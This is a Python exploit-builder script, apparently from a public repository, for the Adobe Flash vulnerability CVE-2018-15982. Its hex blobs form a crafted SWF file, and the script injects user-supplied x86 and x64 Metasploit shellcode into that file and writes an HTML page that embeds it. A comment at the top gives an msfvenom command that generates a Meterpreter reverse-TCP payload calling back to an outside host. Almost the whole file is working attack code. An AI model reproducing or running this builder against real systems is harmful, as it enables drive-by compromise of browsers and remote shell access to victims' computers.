-
Notifications
You must be signed in to change notification settings - Fork 61
/
Copy pathCVE_2018_15982.py
114 lines (104 loc) · 20.1 KB
/
CVE_2018_15982.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/usr/bin/env python
#coding=utf-8
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 lport=8080 -f raw > ~/Desktop/test.bin
import argparse
import struct
LOGO =R"""
█████▒██▓ ▄▄▄ ██████ ██░ ██
▓██ ▒▓██▒ ▒████▄ ▒██ ▒ ▓██░ ██▒
▒████ ░▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒██▀▀██░
░▓█▒ ░▒██░ ░██▄▄▄▄██ ▒ ██▒░▓█ ░██
░▒█░ ░██████▒▓█ ▓██▒▒██████▒▒░▓█▒░██▓
▒ ░ ░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒
░ ░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░
░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░
"""
data1 = "46575324fdfefcfb780007d00000177000001e01004411190000007f13cb0100003c7264663a52444620786d6c6e733a7264663d27687474703a2f2f7777772e77332e6f72672f313939392f30322f32322d7264662d73796e7461782d6e7323273e3c7264663a4465736372697074696f6e207264663a61626f75743d272720786d6c6e733a64633d27687474703a2f2f7075726c2e6f72672f64632f656c656d656e74732f312e31273e3c64633a666f726d61743e6170706c69636174696f6e2f782d73686f636b776176652d666c6173683c2f64633a666f726d61743e3c64633a7469746c653e41646f626520466c65782034204170706c69636174696f6e3c2f64633a7469746c653e3c64633a6465736372697074696f6e3e687474703a2f2f7777772e61646f62652e636f6d2f70726f64756374732f666c65783c2f64633a6465736372697074696f6e3e3c64633a7075626c69736865723e756a776b676b633c2f64633a7075626c69736865723e3c64633a63726561746f723e756a776b676b633c2f64633a63726561746f723e3c64633a6c616e67756167653e454e3c2f64633a6c616e67756167653e3c64633a646174653e5365702031352c20323031343c2f64633a646174653e3c2f7264663a4465736372697074696f6e3e3c2f7264663a5244463e004410e8033c004302ffffff5a0a03000000060000000406a15a00000000000013a4bed865010000c50a4d61696e00"
data2 = "bf149c1e0000010000006672616d65310010002e0013800200189811cdb4c104808004808094c207ffff03808020cb8ac9f204c598cd9103c188d98a04d092cd9103d6d2c9a307f4ca8da307d68ac99a05d392bdf20480800200030000e0ffffffef4100000000e0ffef417b0004766f69640475696e7406436c617373300c666c6173682e6576656e7473054576656e7406537472696e6703696e74044d61696e0d666c6173682e646973706c6179065370726974650456617235045661723607426f6f6c65616e0456617237045661723804566172390556617231300556617231310556617231320556617231330556617231340b5f5f4153335f5f2e76656306566563746f7206436c6173733505566172313506436c6173733305566172313606436c61737334055661723139055661723230055661723233055661723235055661723236055661723332055661723432055661723338055661723430055661723433055661723531055661723536055661723736055661723137064f626a656374086d5f436c6173733106436c61737331055661723339055661723232076d782e636f72650a49466c657841737365740e42797465417272617941737365740b666c6173682e7574696c7309427974654172726179166d782e636f72653a427974654172726179417373657406436c6173733606436c6173733705566172393805566172393908746f537472696e67066f666673657406436c61737332065661723939370656617239393806566172393933065661723939340656617239393506566172393936045661723105436c6173730456617232045661723304566172340556617231382a687474703a2f2f7777772e61646f62652e636f6d2f323030362f666c65782f6d782f696e7465726e616c0756455253494f4e0b342e362e302e32333230310b6d785f696e7465726e616c21687474703a2f2f61646f62652e636f6d2f4153332f323030362f6275696c74696e14666c6173682e646973706c61793a53707269746524666c6173682e646973706c61793a446973706c61794f626a656374436f6e7461696e65721f666c6173682e646973706c61793a496e7465726163746976654f626a6563741b666c6173682e646973706c61793a446973706c61794f626a6563741c666c6173682e6576656e74733a4576656e7444697370617463686572057374616765106164644576656e744c697374656e65720e41444445445f544f5f535441474509666c6173682e6e65740f4c6f63616c436f6e6e656374696f6e014107636f6e6e656374054572726f7201650c666c6173682e73797374656d0c4361706162696c69746965730a69734465627567676572066c656e6774680776657273696f6e012c0573706c69740541727261790120087061727365496e740463616c6c056170706c7908706f736974696f6e0f72656164556e7369676e6564496e7404707573681372656d6f76654576656e744c697374656e657206456e6469616e0d4c4954544c455f454e4449414e06656e6469616e22636f6d2e61646f62652e747673646b2e6d65646961636f72652e6d65746164617461084d65746164617461097365744f626a656374066b65795365740a63686172436f646541740f4576656e74446973706174636865720d446973706c61794f626a65637411496e7465726163746976654f626a65637416446973706c61794f626a656374436f6e7461696e657202307801602216011605160a180916170500181d1819163116341836183718381804183d181b182e084a05001701084e1a091a4f1a501a511a521a531657165d1670050005001a1b0601090d060113141504161718191a1b050c060113141504161718191a1b0101071f0120141510217507010207010307010407020607010707010807010907030b07010c07010d07010e07010f0701100701110701120701130701140701150701160705180701191d14011507011a07011b1d14011807011c07011d1d14011b07061e07061f07062007062107062207062307062407062507012607062707062807062907062a07062b07012c07012d07012e07012f070130070932070933070a3509320107013707013807013907013a07013b07013c07013d07013e07013f07014007014107014207014307014407014507014607014707014807014907124b07094d091802070154070155070156071c5807015a07015b07015c1b03071d5e07015f0701601d14010207016107156307016409630307016607156707156807016907016a07156b1d14013a07016c070a6d07016e07016f1d14010507153b071e71070172070173071574070275070376070377070378093301093704093804096005096f05092e0433000000000001000400000000000100000102020000020102020000010202000004020202020200000402020202020000010203000002010302000001030300000403020202030000040302020203000000010000000100000101040008010c0c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200020200000005000001030600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b0708090400021a0900000501010a00000b0a0a0c00000b0a0a0d00000b0a0a0e00000201030f0000020203100000030c0c110000020203120000020203130000160017000019001a00001c001d0100031e0100041f010005200100062101000722010008230100092401000a2501000b2601000c2701000d2801000e2901000f2a0100101b2b09070013012c00002d00152b09080016022e00000203032f00000204033000050019003132090b01331c003431090c001f003531090d002200032b090e0025043600000200370000020038010026390100273a2b090f002a013b00002b0c0c182b0910002d023c00002b002c00002d002d2b09110030043d00000201063e00000201063f000002010640000002010600054100014200430002420044000332004500043200461103011200150018001b01470601054c011e002100240029002c002f000c11010704010014011b0401011701150401021a01300400031d01310400042001340400052301350400062801030401072b013a0401082e011804010931012d04000a32014806000012083200020108090fd0305e41603561415e4360346143470000010102080903d030470000020301090a4ad030d060496015530125800442016813d060496018530125800442016817d06049601b53012580044201681ad04900604a12080000d04f2a00100c00005d4b6004664cd0662a4f4b02470000030302090c29d0305d4d4a4d002c594f4e015d4d4a4d002c594f4e01100e0000d0305a002ad52a302b6d011d0801470102161a4f5000040303090a31d030240074d6d06613d066116651d12410a1612fd06617d066126651662c663d74d6d06613d066116651d0660f612fd2480000050303090a2bd030d06613d066116651d12410a1612fd06617d066126651662cd2613dd06613d066116651d0660f612f470000060202090a27d030d12f02a874d51014000009d0d1461e012d0514020000d148d12d06a174d510e8ffff2400480000070709090a9801d030240074630724007463086204d06204d06204243ca0461e01a0258001a0461e01a074630524ff6306104b000009d062056206c02a7363062414a2a0240ca0461e01742a6307110600005d4f4a4f000362046207a0746308d06208461e01d1ab2a120b000029d06208d3a0461e01d2ab120400001004000010b1ffffd0d06204d0620562062414a2a02410a0461e01a0461e0146200148000008070d090ada01d030240074630b240074630c6204d06204d06204243ca0461e01a02478a0461e01a0746305d062052418a0461e017463066204d06205241ca0461e01a07463076204d062052420a0461e01a07463086204d062052424a0461e01a0746309240074630a1052000009d06208620a2404a2a0461e0174630b6204620ba074630cd0620c461e01d1ab2a120b000029d0620cd3a0461e01d2ab12180000d0620cd3a02402a0461e012f02a82d0713040000100a0000620a9174630a10aaffff6204d06207d06209620a2402a2a0461e012d08a82404a2a0461e01a0480000090303090a51d030240074d6d06613d066116651d16636612fd06613d066116651d166372420a1612ed0661ad066126651662c663d74d6d06613d066116651d066106636612fd06613d066116651d066106637612ed24800000a0303090a4bd030d06613d066116651d16636612fd06613d066116651d166372420a1612ed0661ad066126651662cd2613dd06613d066116651d066106636612fd06613d066116651d066106637612e4700000b0303090a3cd0305d03d166372f02a8d166364a03028003d6101b000009d0d24623012d0514020000d248d22580e0ffff0f4639018003d610e1ffff5d4f4a4f000300000c060e090afc01d030208003630b208003630c208003630d2400746305d06204243c4639014623017463066204620646390180032a6307259001463901800363085d0362046637d06208462301a0620466364a030280036309d06208240446390146230174630a108a000009620962052414a24639018003630b5d03d0620b240c46390146230162046637a0620466364a03028003630c5d03d0620b241046390146230162046637a0620466364a03028003630dd0620c462301d1ab2a120d000029d0620cd3463901462301d2ab121b0000d05d03d0620d462301d0620d24044639014623014a03024625014862052401a07463056205620a156effff5d4f4a4f000300000d0612090aea02d030208003630e24007463102080036311d06204243c4639014623017463056204620546390180032a6306258801463901800363075d0362046637d06207462301a0620466364a030280036308d062072404463901462301746309d06208241846390146230174630a5d03d06208241c46390146230162046637a0620466364a03028003630b5d03d06208242046390146230162046637a0620466364a03028003630c5d03d06208242446390146230162046637a0620466364a03028003630d240074630f10930000095d0362046637d0620c620f2404a2463901462301a0620466364a03028003630ed0620e462301d1ab2a120d000029d0620ed3463901462301d2ab124c0000d0620ed32402a04639014623012f02a82d0713360000d0620d620f2402a24639014623012d08a82404a27463105d0362046637d0620b6210463901462301a0620466364a030280032a631148620f2401a074630f620f620a1565ffff5d4f4a4f000300000e0619090aba07d0302400746318240074d51010000009d06617d15d184a18006151d19174d5d1d0660e15e8ffff240074d5103d000009d06613d16651662e2418ab962a120c000029d06613d16651662e2d09af12170000d0d16811d0d06613d16651662f680fd026680a100c0000d19174d5d1d0660e15bbffffd0660a1101000047d06613d066116651d06613d066116651662e93612f240074d51021000009d06617d16651662c663d2f01130c0000d0d16812d027680a100c0000d19174d5d1d0660e15d7ffffd0660a1201000047d06613d066116651d0660f612fd0d06613d066116651662e93461e0174d6d0d246200174d724007463046052665312120000d02d0a2d0b2404d3462104746304101d0000d02d0c2d0d2404d3462104746318d02d0a2d0b24046218462104746304d02d0e2d0f240a6204462204746305646c01664466542408a0258020a0746306604960025301620642018055630724007463086052665312090000241c746308100500002418746308d06617d0661266516207613cd0d06613d066116651662e936208a0461e01742a63092404a0746309d06617d0661266516046613cd06613d066116651662e9374630a240074630b240074630c60526656852a630d2c6246570180582a630e240066512c654659018058630f5d5a620f24016651465a01752a6310241e0f1c000060526653120a000025c40174630c1006000025b80174630c1018000060526653120a000025bc0174630c1006000025b00174630cd0d0d0d0620a2408a0461e012414a0461e012404a0461e01620ca0461e0174630bd0620b461e01746311d0620a241ca0461e01746312d0620a2420a0461e01746313240074d51022000009d062092408a0d12404a2a0d06211258001a1d12404a2a0461e014f1f02d19174d5d125800215d6ffffd062092408a0258001a0241ca062054f1f02d0620b62092408a0258001a04f1f02d0620a241ca062094f1f02d0620a2420a0620766542404a24f1f025d5824414a5801805863146046665b2062144f5c0220805863152080556316560080586315646c0166442400615d2400746317240074631710160000096215646c016644465e004f5f0162172404a07463176217646c016644665415ddffff604960025301646215410180556316240074d51013000009620725f403d1a06216d166516151d19174d5d16216665415e4ffffd062092408a0258001a0241ca0620925f4032404a2a04f1f02d0620b62092408a0258001a04f1f026046665b20204f5c02d0620a241ca062124f1f02d0620a2420a062134f1f02d0620b62114f1f024700000f0625090ac50ed03020800363042080036305208003630624007463246049603a5301d0660e42018060d5646c016646802bd6240074d71015000009d1d35d3a4a3a006151d1d36651d2613bd39174d7d3d0660e15e3ffff5d5824044a580180586307646c0166456654258020a07463086049600253016208420180556309240074630a60526653120c0000241c2402a274630a1008000024182402a274630a240074d710c0000009d06613d36651662e2418ab962a120c000029d06613d36651662e2d09af129a00005d03d06613d36651662e93d06613d36651662f4a03028003630424007463241010000009d1622466516209613b6224917463246224d0660e15e7ffff5d03d06613d36651662e93d06613d36651662f4a03028003630524007463241010000009d1622466516207613b6224917463246224d0660e15e7ffff5d03d06613d36651662e93d06613d36651662f4a030280036306d026680a100c0000d39174d7d3d0660e1538ffffd0660a1101000047d124006154208060d5d04f1d00240074d71010000009d0661ad35d1b4a1b006151d39174d7d3d0660e15e8ffff240074d71062000009d06613d36651662e2418ab962a120f000029d06613d36651662e2402a42400ab2a120c000029d06613d36651662e2d09af12280000d0d36811d05d03d06613d066116651662ed06613d066116651662f4a03026810d027680a100c0000d39174d7d3d0660e1596ffffd0660a1201000047d06613d066116651d06613d066116651662e2420a1612e240074d71021000009d0661ad36651662c663d2f01130c0000d0d36812d026680a100c0000d39174d7d3d0660e15d7ffffd0660a1101000047d06613d066116651d066106637612e5d03d0d06610462301d0d0661024044639014623014a03028003630bd0620b4625018003630cd02d102d112403620c4626048003630dd02d0a2d0b2404620d4626048003630ed02d0e2d0f240a620e4627048003630f24006310208058631120805563125d03d06205620a463901462301d06205620a2404a04639014623014a030280032a2a631366372404a061375d03d062042410463901462301d0620424144639014623014a0302800363145d03d062142428463901462301d06214242c4639014623014a0302800363155d03d062152408463901462301d06215240c4639014623014a030280036316240074631760526656852a63182c6246570180582a6319240066512c654659018058631a5d5a621a24016651465a01752a631b241e0f1c000060526653120a000025a002746317100600002590027463171018000060526653120a0000259802746317100600002588027463175d03d062166217463901462301d0621662172404a04639014623014a03028003631c5d03d0621c462301d0621c24044639014623014a03028003631d24fe631e101a0000096209621e2402a0d0621c621e2404a24639014623016151c21e621e25c00215ddffff25c20274d7101b0000096209d3d0621dd325c202a12404a24639014623016151d39174d7d325c20225e4012404a3a015d6ffffd0621325880a2430a0463901620f66374f2402d0621325880a2434a0463901620f66364f2402d062132408463901621325880a46390166374f2402d06213240c463901621325880a46390166364f2402d0621662174639016213240846390166374f2402d0621662172404a04639016213240846390166364f24025d03d062042438463901462301d06204243c4639014623014a03028003631fd0620424384639015d03620966542404a224004a030266374f2402d06204243c4639015d03620966542404a224004a030266364f24025d03d062042440463901462301d0620424444639014623014a030280036320d0620424404639015d03244024004a030266374f2402d0620424444639015d03244024004a030266364f24025d03d06206462301d0620624044639014623014a03028003632160462062074f5c02d06206622166374f2402d062062404463901622166364f2402d062042438463901621f66374f2402d06204243c463901621f66364f2402d062042440463901622066374f2402d062042444463901622066364f2402d062166217463901621c66374f2402d0621662172404a0463901621c66364f2402240074d7100c0000096209d324006151d39174d7d325f80315ecffff240074d710170000096209d3d0621dd32404a24639014623016151d39174d7d325e4012404a315deffff20805863222080556323560080586322646c0166452400615d2400631010160000096222646c016645465e004f5f0162102404a07363106210646c016645665415ddffff604960025301646222410180556323240074d71013000009620925f403d3a06223d366516151d39174d7d36223665415e4ffffd062132430463901621325f4032404a246390166374f2402d062132434463901621325f4032404a246390166364f2402d0621c621366374f2402d0621c2404463901621366364f240260462062074f5c02d0621c621d66374f2402d0621c2404463901621d66364f2402470000100308090a8b03d03024007463075d616004664cd0662a4f61025e445d434a4300603287614460446062666361645e455d414a41006032876145604560626663616460496005530125802042018065d6240074d7100d000009d2d3d34666006151d39174d7d325802015ebffff240074d7100c000009d2d3206151d32402a074d7d325802015ecffffd04f1d005d324a3200803263045d674a6700806763052080656306240074d710100000096205d346660062044f6802d39174d7d3d0660e15e8ffffd04f1d006205666980656306240074d71010000009d06613d35d154a15006151d39174d7d3d0660e15e8ffff240074d7106c0000096206d3665166542418145a00006206d366512404466a01742a63076206d366512405466a012408a5a9742a63076206d366512406466a012410a5a9742a63076206d366512407466a012418a5a9742a63072d120c080000d026680c10040000d026680d100c0000d39174d7d3d0660e158cffff6206240061542080656306d04f1d00d0660c12040000d04f2900d0660d12040000d04f2800470000110201010823d0306500602b30606b30606c30606d30606e30600830600858001d1d1d1d1d1d6807470000120101030403d03047000013020104050ed030d05d2d4a2d00682cd0490047000014020101030fd0306500602b30602b58011d681b470000150101030403d030470000160101040506d030d0490047000017020101030fd0306500602b30602b58021d68154700001800010303014700001a020101020ad0305d3320580368304700001b0201040509d0305e472c4c68474700001c0101050606d030d049004700001d0201010413d0305d6f602b30603230603258041d1d68314700001e0101050603d0304700001f0101060706d030d04900470000200201010517d0305d70602b30603230603130603158051d1d1d6834470000210101050603d030470000220101060706d030d04900470000230201010517d0305d71602b30603230603130603158061d1d1d6835470000240101030403d03047000025020304050ed030d04900d0d16837d0d2683647000026030104051ad0302c79d066362410466601a02c7aa0d066372410466601a0480000270302040510d0305d03d06637d1a0d066364a030248000028020101030fd0306500602b30602b58071d6803470000290101030403d0304700002a0101040506d030d049004700002b020101030fd0306500602b30602b58081d683a4700002c0101030403d0304700002d0201040527d030d05d324a3200683cd05d2d4a2d00682cd04900d0663c2580206172d0663c6062666361734700002e020101030fd0306500602b30602b58091d68184700002f0101030403d030470000300101040506d030d0490047000031020101030fd0305d74602b30602b580a1d682d470000320101010203d0304700001b1303000100436c61737336000200436c617373370000004d61696e0040000000"
def hex2char(data):
output = data.strip().decode('hex')
return output
def char2hex(data):
output = data.encode('hex')
return output
def repair(data):
while len(data)/2 % 4 != 0:
data = data + "00"
return data
def genexp(file,sfile,out):
f = open(file, 'rb')
data = f.read()
tmp = char2hex(data)
f.close()
g = open(sfile,'rb')
sdata = g.read()
stmp = char2hex(sdata)
g.close()
tmp = repair(tmp)
stmp = repair(stmp)
binary_data_len = len(tmp)/2
binary_data_len2 = len(stmp)/2
exptmp = data1 + generate_definebinarydata_tag(0x01, binary_data_len)+ tmp + generate_definebinarydata_tag(0x02, binary_data_len2) + stmp + data2
swflen = struct.pack('I',len(exptmp)/2).encode('hex')
expfina = exptmp.replace('fdfefcfb',swflen,1)
writeout(out, expfina)
def writeout(file,data):
f = open(file, "wb")
f.write(hex2char(data))
f.close()
'''
1 1.1 2 3 4
"ff15 1d010000 0200 00000000 xxxxxx"
1: tag_code_and_length_16
1.1: length_32, exist only if size of payload is more than or equal to 0x3F.
2: data_id_16
3: reserved_32, always be 00000000
4: payload data
'''
def generate_definebinarydata_tag(data_id, binary_data_len):
tag_code_and_length_16 = struct.pack('h', ((0x57 << 6) | 0x3F)).encode('hex')
length_32 = ''
data_id_16 = struct.pack('h', data_id).encode('hex')
reserved_32 = struct.pack('I', 0).encode('hex')
if binary_data_len >= 0x3F:
length_32 = struct.pack('I', binary_data_len + 6).encode('hex')
else:
tag_code_and_length_16 = struct.pack('h', (0x57 << 6) | binary_data_len).encode('hex')
return tag_code_and_length_16 + length_32 + data_id_16 + reserved_32
if __name__ == '__main__':
print LOGO
parser = argparse.ArgumentParser(description="exp for CVE-2018-15982")
parser.add_argument(
"-i", "--bin", help="Input MSF x86 shellcode.bin", required=True)
parser.add_argument(
"-I", "--sbin", help="Input MSF x64 shellcode.bin", required=True)
parser.add_argument(
'-o', "--output", help="Output exploit swf and index.html", default="exploit.swf",required=False)
args = parser.parse_args()
genexp(args.bin,args.sbin,args.output)
html = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/>
<title>CVE-2018-15982 Exploit</title>
<meta name="description" content="" />
<style>
html, body { height:100%; overflow:hidden; }
body { margin:0; }
</style>
</head>
<body>
<div id="altContent">
<h1>CVE-2018-15982(Flash Exploit)</h1>
</div>
""" + "<embed src=\"" + args.output + "\"></embed>" + """
</body>
</html>
"""
f = open("index.html", "wb")
f.write(html)
f.close()
print "[*] Done ! output file --> " + args.output
print "[*] Done ! output file --> index.html"